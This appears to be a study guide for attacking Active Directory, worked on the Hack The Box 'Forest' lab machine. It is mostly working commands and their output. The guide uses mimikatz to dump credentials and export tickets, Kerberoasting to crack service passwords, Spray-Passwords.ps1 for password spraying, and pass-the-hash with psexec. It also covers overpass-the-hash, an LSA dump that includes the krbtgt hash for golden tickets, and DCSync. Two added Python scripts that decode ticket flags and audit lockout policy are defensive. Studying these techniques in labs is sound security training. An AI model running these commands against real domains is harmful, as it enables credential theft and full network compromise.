Active Directory:
For this topic in particular I will be using the Forest machine from Hack The Box to run several techniques that allow an AD to be compromised. These techniques are not necessarily the ones used to solve the machine.
Practice machine: Forest from Hack The Box.
Access: psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected]
Gathering information the traditional way:
net user
net user /domain
net user moyapj /domain
net group
net group /domain
Gathering information with PowerShell
Get domain information:
PS C:\Windows\system32> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Using tools:
Powerview.ps1
This tool can be downloaded from here.
It is part of the PowerShellEmpire tool set; to load it, run the following:
PS C:\tmp> Import-Module .\Powerview.ps1
PS C:\tmp> Get-NetLoggedon -ComputerName forest
wkui1_username wkui1_logon_domain wkui1_oth_domains wkui1_logon_server
-------------- ------------------ ----------------- ------------------
FOREST$ HTB
To list the domain's computers (Get-ADComputer comes from the ActiveDirectory RSAT module, not from PowerView):
Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,ipv4Address | Export-CSV ADcomputerslist.csv -NoTypeInformation -Encoding UTF8
To list the network sessions of a domain computer:
PS C:\tmp> Get-NetSession -ComputerName forest
sesi10_cname sesi10_username sesi10_time sesi10_idle_time
------------ --------------- ----------- ----------------
\10.10.14.27 administrator 414 410
\10.10.14.27 administrator 409 5
\10.10.14.27 administrator 409 0
\10.10.14.27 administrator 408 265
\[::1] FOREST$ 19 5
Using mimikatz:
Mimikatz extracts credentials from memory, where they are stored encrypted together with the key needed to decrypt them.
PS C:\tmp> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #19041 May 19 2020 00:48:32
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz #
Before extracting the hashes we must first check that we hold the required privilege.
mimikatz # privilege::debug
Privilege '20' OK
Now, by running the sekurlsa module, we extract the hashes.
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:20:38 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : FOREST$
* Domain : HTB
* NTLM : 7b9c43259d65eda955306bd375599049
* SHA1 : d447b11891ce103e53fcf31e87feaf7f3510021f
tspkg :
wdigest :
* Username : FOREST$
* Domain : HTB
* Password : (null)
kerberos :
* Username : forest$
* Domain : HTB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 35268 (00000000:000089c4)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 5/21/2020 11:20:34 AM
SID :
msv :
[00000003] Primary
* Username : FOREST$
* Domain : HTB
* NTLM : 7b9c43259d65eda955306bd375599049
* SHA1 : d447b11891ce103e53fcf31e87feaf7f3510021f
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/21/2020 11:20:39 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:20:34 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : FOREST$
* Domain : HTB
* Password : (null)
kerberos :
* Username : forest$
* Domain : HTB.LOCAL
* Password : (null)
ssp :
credman :
The command output shows both NTLM and SHA1 hashes. The NTLM hashes are what the Pass the Hash (PtH) technique uses.
To see the tickets, the same sekurlsa module is used with the following command.
mimikatz # sekurlsa::tickets
Authentication Id : 0 ; 30712496 (00000000:01d4a2b0)
Session : Network from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:33:02 PM
SID : S-1-5-18
* Username : FOREST$
* Domain : HTB.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 5/21/2020 8:51:57 PM ; 5/22/2020 6:51:57 AM ; 5/28/2020 11:21:17 AM
Service Name (02) : krbtgt ; HTB.LOCAL ; @ HTB.LOCAL
Target Name (--) : @ HTB.LOCAL
Client Name (01) : FOREST$ ; @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d577a70695e74b6ed73af919437e6b23552e0c0d19baca1272ac500b196762bb
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
Authentication Id : 0 ; 30712454 (00000000:01d4a286)
Session : Network from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:33:02 PM
SID : S-1-5-18
* Username : FOREST$
* Domain : HTB.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 5/21/2020 8:51:57 PM ; 5/22/2020 6:51:57 AM ; 5/28/2020 11:21:17 AM
Service Name (02) : krbtgt ; HTB.LOCAL ; @ HTB.LOCAL
Target Name (--) : @ HTB.LOCAL
Client Name (01) : FOREST$ ; @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d577a70695e74b6ed73af919437e6b23552e0c0d19baca1272ac500b196762bb
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
The output shows the TGS (Ticket Granting Service) tickets and the TGTs (Ticket Granting Tickets).
Attacks on Service Accounts
The klist command shows the tickets held in the cache.
PS C:\Windows\system32> klist
Current LogonId is 0:0x3e7
Cached Tickets: (8)
#0> Client: forest$ @ HTB.LOCAL
Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: FOREST
#1> Client: forest$ @ HTB.LOCAL
Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: FOREST
#2> Client: forest$ @ HTB.LOCAL
Server: cifs/FOREST @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:30:15 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#3> Client: forest$ @ HTB.LOCAL
Server: FOREST$ @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:41 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#4> Client: forest$ @ HTB.LOCAL
Server: cifs/FOREST.htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#5> Client: forest$ @ HTB.LOCAL
Server: LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#6> Client: forest$ @ HTB.LOCAL
Server: LDAP/FOREST @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#7> Client: forest$ @ HTB.LOCAL
Server: ldap/FOREST.htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
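The hex values in the "Ticket Flags" lines above (0x60a10000, 0x40e10000, 0x40a50000) are the Kerberos TicketFlags bit string, and klist only prints the decoded names next to them. The following script is an added example, not part of the original notes: it parses a klist-style listing (a constructed, shortened copy of the one above) and decodes the flags itself from the bit layout in RFC 4120 section 5.3.1 (the same bits as KERB_TICKET_FLAGS_* in the Windows SDK), then summarises what a reviewer of a host's ticket cache looks at first: cached TGTs, tickets obtained by forwarding, and services the KDC marked ok_as_delegate.

```python
"""Decode the Kerberos ticket flags shown by klist and mimikatz.

Added example, not part of the original notes. SAMPLE_KLIST is a
constructed, shortened copy of the listing in the notes.
"""
import re
from typing import Dict, List

# Flag bit numbers as in the ASN.1 BIT STRING: bit i is the mask 0x80000000 >> i.
TICKET_FLAG_BITS = {
    "forwardable": 1, "forwarded": 2, "proxiable": 3, "proxy": 4,
    "may_postdate": 5, "postdated": 6, "invalid": 7, "renewable": 8,
    "initial": 9, "pre_authent": 10, "hw_authent": 11,
    "transited_policy_checked": 12, "ok_as_delegate": 13,
    "name_canonicalize": 15,
}

SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7
Cached Tickets: (3)
#0> Client: forest$ @ HTB.LOCAL
    Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
    Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
    Cache Flags: 0x2 -> DELEGATION
#1> Client: forest$ @ HTB.LOCAL
    Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
    Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
    Cache Flags: 0x1 -> PRIMARY
#2> Client: forest$ @ HTB.LOCAL
    Server: cifs/FOREST @ HTB.LOCAL
    Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
    Cache Flags: 0
"""


def decode_ticket_flags(flags: int) -> List[str]:
    """Return the names of the bits set in a 32-bit TicketFlags value."""
    return [name for name, bit in TICKET_FLAG_BITS.items()
            if flags & (0x80000000 >> bit)]


def parse_klist(text: str) -> List[Dict]:
    """Split klist output into one dict per cached ticket."""
    tickets: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"#(\d+)>\s+Client:\s+(.+)", line)
        if m:
            current = {"index": int(m.group(1)), "client": m.group(2).strip()}
            tickets.append(current)
            continue
        if current is None:
            continue
        m = re.match(r"Server:\s+(.+)", line)
        if m:
            current["server"] = m.group(1).strip()
            continue
        m = re.match(r"Ticket Flags\s+0x([0-9a-fA-F]+)", line)
        if m:
            current["flags"] = int(m.group(1), 16)
            current["flag_names"] = decode_ticket_flags(current["flags"])
    return tickets


def summarize(tickets: List[Dict]) -> Dict:
    """Counts a reviewer of a ticket cache wants first: cached TGTs, tickets
    obtained by forwarding (a delegated credential), and services that the
    KDC marked ok_as_delegate (clients may forward their TGT to them)."""
    return {
        "tgt": sum(1 for t in tickets if t.get("server", "").startswith("krbtgt/")),
        "forwarded": sum(1 for t in tickets if "forwarded" in t.get("flag_names", [])),
        "ok_as_delegate": [t["server"] for t in tickets
                           if "ok_as_delegate" in t.get("flag_names", [])],
    }


if __name__ == "__main__":
    parsed = parse_klist(SAMPLE_KLIST)
    for t in parsed:
        print(f"#{t['index']} {t['server']}: 0x{t['flags']:08x} -> {' '.join(t['flag_names'])}")
    print(summarize(parsed))
```

The decoded names match what klist prints for each of the three values, which confirms the bit positions; name_canonicalize is the Windows name for bit 15 (0x00010000), the bit RFC 6806 later assigned to enc-pa-rep.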
With Mimikatz it is also possible to extract this information.
mimikatz # kerberos::list -export
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:47 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:36 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : DNS/forest.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:10 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : GC/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:30:15 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000006] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:41 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : FOREST$ @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000007] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000008] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000009] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : LDAP/FOREST @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[0000000a] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : ldap/FOREST.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
mimikatz # kerberos::list -export
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
* Saved to file : 0-60a10000-forest$@krbtgt~HTB.LOCAL-HTB.LOCAL.kirbi
[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
* Saved to file : 1-40e10000-forest$@krbtgt~HTB.LOCAL-HTB.LOCAL.kirbi
[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:47 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 2-40a50000-forest$@cifs~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:36 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : DNS/forest.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 3-40a50000-forest$@DNS~forest.htb.local-HTB.LOCAL.kirbi
[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:43:10 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : GC/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 4-40a50000-forest$@GC~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:30:15 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 5-40a50000-forest$@cifs~FOREST-HTB.LOCAL.kirbi
[00000006] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:41 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : FOREST$ @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 6-40a50000-forest$@FOREST$-HTB.LOCAL.kirbi
[00000007] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : cifs/FOREST.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 7-40a50000-forest$@cifs~FOREST.htb.local-HTB.LOCAL.kirbi
[00000008] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 8-40a50000-forest$@LDAP~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000009] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : LDAP/FOREST @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 9-40a50000-forest$@LDAP~FOREST-HTB.LOCAL.kirbi
[0000000a] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
Server Name : ldap/FOREST.htb.local @ HTB.LOCAL
Client Name : forest$ @ HTB.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 10-40a50000-forest$@ldap~FOREST.htb.local-HTB.LOCAL.kirbi
To recover the service account's credential, transfer the .kirbi file of the desired service and then obtain the password with the kerberoast package.
The following package must be installed for this.
pip3 install kerberoast
The password is then cracked as follows.
python3 tgsrepcrack.py ../../hackthebox/wordlist.txt 8-40a50000-forest\$@LDAP\~FOREST.htb.local\~htb.local-HTB.LOCAL.kirbi
When the process finishes it yields the service account's password, which can then be used to escalate privileges.
Other credential-gathering techniques
First, the directory's account policy must be known.
PS C:\tmp> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
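The setting that matters most in that output is "Lockout threshold: Never": with lockout disabled, online guessing against every account is limited only by logging and alerting. The script below is an added example, not part of the original notes: it parses the text that net accounts prints into a dictionary and reports every setting weaker than a baseline. The baseline numbers are this example's own assumptions and should be replaced with the organisation's standard; the sample output is the one shown above.

```python
"""Audit the account policy that 'net accounts' prints.

Added example, not part of the original notes. BASELINE holds assumed
values; SAMPLE_NET_ACCOUNTS is the output from the notes.
"""
from typing import Dict, Union

SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
"""

# Assumed baseline (not a published standard). 'Lockout threshold' is the
# number of failed attempts before the account locks.
BASELINE = {
    "Minimum password length": 14,
    "Length of password history maintained": 24,
    "Lockout threshold": 10,
    "Lockout duration (minutes)": 15,
    "Lockout observation window (minutes)": 15,
}

Value = Union[int, str, None]


def parse_net_accounts(text: str) -> Dict[str, Value]:
    """Map each 'Setting: value' line to an int, a str, or None for 'Never'."""
    policy: Dict[str, Value] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # status line such as 'The command completed successfully.'
        value = value.strip()
        if value.lower() == "never":
            policy[key.strip()] = None
        elif value.isdigit():
            policy[key.strip()] = int(value)
        else:
            policy[key.strip()] = value
    return policy


def audit_policy(policy: Dict[str, Value]) -> Dict[str, str]:
    """Return {setting: finding} for every setting weaker than BASELINE."""
    findings: Dict[str, str] = {}
    threshold = policy.get("Lockout threshold")
    if threshold is None:
        findings["Lockout threshold"] = (
            "Never: accounts never lock, so online guessing is limited only "
            "by logging and alerting")
    else:
        if threshold > BASELINE["Lockout threshold"]:
            findings["Lockout threshold"] = (
                f"{threshold} exceeds baseline {BASELINE['Lockout threshold']}")
        # Duration and window only matter when lockout is enabled. A duration
        # of 0 means 'until an administrator unlocks', which is stricter, not weaker.
        for key in ("Lockout duration (minutes)", "Lockout observation window (minutes)"):
            observed = policy.get(key)
            if isinstance(observed, int) and observed != 0 and observed < BASELINE[key]:
                findings[key] = f"{observed} is below baseline {BASELINE[key]}"
    for key in ("Minimum password length", "Length of password history maintained"):
        observed = policy.get(key)
        if not isinstance(observed, int) or observed < BASELINE[key]:
            findings[key] = f"{observed} is below baseline {BASELINE[key]}"
    return findings


if __name__ == "__main__":
    for setting, finding in audit_policy(parse_net_accounts(SAMPLE_NET_ACCOUNTS)).items():
        print(f"{setting}: {finding}")
```

On the policy above it reports two gaps: the disabled lockout threshold and the 7-character minimum length. Maximum password age is deliberately not checked; forced rotation is no longer a recommended control and does not change the exposure shown here.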
Once the account lockout threshold has been identified, a brute-force attack can be run with the Spray-Passwords.ps1 script.
https://raw.githubusercontent.com/ZilentJack/Spray-Passwords/master/Spray-Passwords.ps1
To do so, the script is transferred to the Windows victim machine and then run as follows:
PS C:\tmp> .\Spray-Passwords.ps1 -Pass s3rvice -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'svc-alfresco' = 's3rvice'
Users guessed are:
'svc-alfresco' with password: 's3rvice'
With this script it was determined that the user svc-alfresco has the password s3rvice.
Lateral Movement in Active Directory
Pass The Hash
It allows authenticating to a host by supplying the hash instead of the plaintext password. The technique only works when the server or service authenticates with NTLM, not Kerberos.
This is the technique by which the Forest command line was accessed. In this case impacket's psexec.py was used, although the Pass The Hash Toolkit https://github.com/byt3bl33d3r/pth-toolkit could also be used.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected]
Pass The Ticket
Overpass The Hash
It is a combination of two techniques, Pass the Hash and Pass the Ticket: it authenticates with the NTLM hash in order to obtain a valid Kerberos ticket.
mimikatz # sekurlsa::pth /user:svc-alfresco /domain:htb /ntlm:c2b37b75462b3acfa9f489f7dfd715db /run:Powershell.exe
user : svc-alfresco
domain : htb
program : Powershell.exe
impers. : no
NTLM : c2b37b75462b3acfa9f489f7dfd715db
| PID 3196
| TID 1304
| LSA Process is now R/W
| LUID 0 ; 11059431 (00000000:00a8c0e7)
\_ msv1_0 - data copy @ 0000024701D23DA0 : OK !
\_ kerberos - data copy @ 0000024701A34878
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 00000247047D9DA8 (32) -> null
Golden Ticket:
mimikatz # lsadump::lsa /patch
Domain : HTB / S-1-5-21-3072663084-364016917-1341370565
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 32693b11e6aa90eb43d32c72a07ceea6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 819af826bb148e603acb0f33d17632f8
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 00000463 (1123)
User : $331000-VK4ADACQNUCA
LM :
NTLM :
RID : 00000464 (1124)
User : SM_2c8eef0a09b545acb
LM :
NTLM :
RID : 00000465 (1125)
User : SM_ca8c2ed5bdab4dc9b
LM :
NTLM :
RID : 00000466 (1126)
User : SM_75a538d3025e4db9a
LM :
NTLM :
RID : 00000467 (1127)
User : SM_681f53d4942840e18
LM :
NTLM :
RID : 00000468 (1128)
User : SM_1b41c9286325456bb
LM :
NTLM :
RID : 00000469 (1129)
User : SM_9b69f1b9d2cc45549
LM :
NTLM :
RID : 0000046a (1130)
User : SM_7c96b981967141ebb
LM :
NTLM :
Active Directory Synchronization
A domain controller usually has one or more replicas; mimikatz takes advantage of this (the directory replication protocol the replicas use) to extract hashes.
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/18/2019 10:09:08 AM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
